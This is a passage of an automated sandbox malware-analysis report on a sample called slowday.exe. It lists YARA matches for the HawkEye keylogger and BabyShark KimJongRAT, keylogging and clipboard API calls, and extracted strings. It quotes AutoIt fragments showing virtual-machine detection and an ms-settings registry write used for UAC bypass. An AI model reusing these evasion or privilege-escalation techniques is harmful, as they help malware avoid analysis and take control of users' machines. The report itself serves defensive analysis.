textual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000006.00000003.281713896.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.281366728.0000000002268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected HawkEye Keylogger
            Source: Yara matchFile source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040F078 OpenClipboard,GetLastError,DeleteFileW,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E4CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 35.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4b4834a.3.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.f1834a.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43bb8f2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 1.3.RegAsm.exe.481b8f2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4b4834a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 30.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 8.3.RegAsm.exe.43bb8f2.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 30.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.481b8f2.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 30.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEyeV9 payload Author: ditekshen
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: HawkEye v9 Payload Author: ditekshen
            Source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.f1834a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 1.2.RegAsm.exe.6985bd0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000000.426727221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 0000001E.00000000.426172812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000023.00000002.478736094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000001.00000002.506091373.0000000000EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000023.00000000.476336904.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000000.426437716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000000.427032504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000008.00000002.509855006.0000000004AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 0000001E.00000002.427693844.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000023.00000000.476920702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000023.00000000.476609375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTRMatched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
            Binary is likely a compiled AutoIt script file
            Source: slowday.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: slowday.exe, 00000000.00000002.246013311.0000000000E74000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: slowday.exe, 00000000.00000002.246013311.0000000000E74000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
            Source: winlogons.exe, 00000007.00000002.283157637.0000000001334000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: winlogons.exe, 00000007.00000002.283157637.0000000001334000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
            Source: slowday.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: slowday.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"
            AutoIt script contains suspicious strings
            Source: slowday.exeAutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
            Source: slowday.exeAutoIt Script: HDTNVAKFLIUTJTT = ["vmtoolsd.exe" , "vbox.exe" ] FO
            Source: slowday.exeAutoIt Script: KDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRX
            Source: slowday.exeAutoIt Script: 62178 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute
            Source: winlogons.exe.0.drAutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
            Source: winlogons.exe.0.drAutoIt Script: HDTNVAKFLIUTJTT = ["vmtoolsd.exe" , "vbox.exe" ] FO
            Source: winlogons.exe.0.drAutoIt Script: KDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRX
            Source: winlogons.exe.0.drAutoIt Script: 62178 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DCE800
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DCFE40
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DD70FE
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DD6841
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DCE060
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DD8968
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DEDAF5
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC1287
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF6452
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DE1604
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E47E0D
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DF6F36
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DEBF26
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADCE8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA08B1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAE0A1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD090
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAA1F1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA4998
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5591
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD950
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7518
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD6B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7A19
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3398
